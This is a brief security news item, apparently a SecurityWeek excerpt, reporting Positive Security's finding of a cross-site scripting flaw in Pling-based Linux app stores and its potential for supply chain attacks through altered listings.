According to German cybersecurity firm Positive Security, Linux marketplaces based on the Pling platform are vulnerable to a cross-site scripting (XSS) flaw and could be susceptible to supply chain attacks.
In the context of other users, the XSS vulnerability might be leveraged to change or add new listings to the Pling store. This could be exploited in a supply chain attack where the attacker uploads a backdoored version of an application and modifies the metadata of the victim’s listings to contain the malicious payload.
The vulnerability was first detected in the KDE Discover marketplace, but it also affects other Pling-based FOSS app stores like store.kde.org, appimagehub.com, xfce-look.org, gnome-look.org, and pling.com.
To Read More: Securityweek